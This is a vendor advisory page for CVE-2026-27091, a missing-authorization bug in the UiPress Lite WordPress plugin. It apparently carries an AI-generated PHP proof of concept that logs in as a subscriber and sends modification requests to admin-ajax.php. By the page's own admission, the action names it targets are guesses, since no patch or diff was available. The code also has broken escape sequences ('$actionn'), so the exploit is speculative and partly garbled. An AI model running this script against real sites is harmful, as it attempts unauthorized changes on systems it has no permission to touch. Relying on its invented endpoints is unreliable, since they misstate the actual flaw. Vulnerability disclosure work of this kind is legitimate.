Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-27091: UiPress lite | Effortless custom dashboards, admin themes and pages <= 3.5.09 – Missing Authorization (uipress-lite)

Plugin uipress-lite
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 3.5.09
Patched Version
Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-27091 (metadata-based):
This vulnerability stems from a missing capability check in the UiPress Lite WordPress plugin. The CWE-862 classification confirms the absence of proper authorization verification before executing a privileged function. The description states authenticated attackers with subscriber-level access can perform unauthorized actions. This indicates the plugin registers an AJAX handler, REST endpoint, or admin-post action without verifying the user’s capability (like ‘manage_options’ or a plugin-specific capability). The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) confirms network accessibility, low attack complexity, low privilege requirement, no user interaction, and low integrity impact with no confidentiality or availability effect. The vulnerability likely involves a function triggered via a WordPress hook (wp_ajax_{action}, rest_api_init, or admin_post_{action}) that modifies plugin settings, user preferences, or site data. The fix requires adding a capability check (current_user_can()) or a nonce verification with proper permissions before the sensitive operation. Exploitation allows subscribers to alter data they should not control, potentially disrupting administrative configurations or user experiences. Atomic Edge research infers the endpoint structure from WordPress plugin conventions, as no patched version or code diff is available for confirmation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-27091 - UiPress lite | Effortless custom dashboards, admin themes and pages <= 3.5.09 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2026-27091
 * Assumptions:
 * 1. The plugin registers a vulnerable AJAX action handler for both privileged and non-privileged users (wp_ajax_nopriv_* not required).
 * 2. The action name likely contains the plugin slug 'uipress' or 'uip'.
 * 3. The endpoint is the standard WordPress AJAX handler.
 * 4. The attack requires a low-privilege (subscriber) WordPress account.
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'subscriber'; // CHANGE THIS - subscriber-level account
$password = 'password'; // CHANGE THIS

// Step 1: Authenticate and obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit the missing authorization via AJAX
// Common vulnerable action patterns based on plugin slug
$possible_actions = [
    'uipress_save_settings',
    'uip_save_options',
    'uipress_update_preferences',
    'uip_update_data',
    'uipress_process_action'
];

foreach ($possible_actions as $action) {
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    // Generic payload that might trigger unauthorized modification
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => $action,
        'data' => 'unauthorized_change',
        'option' => 'test_exploit',
        'value' => 'compromised'
    ]));
    $ajax_response = curl_exec($ch);
    
    echo "Testing action: $actionn";
    echo "Response: $ajax_responsenn";
    
    // Add delay to avoid rate limiting
    sleep(1);
}

curl_close($ch);
unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School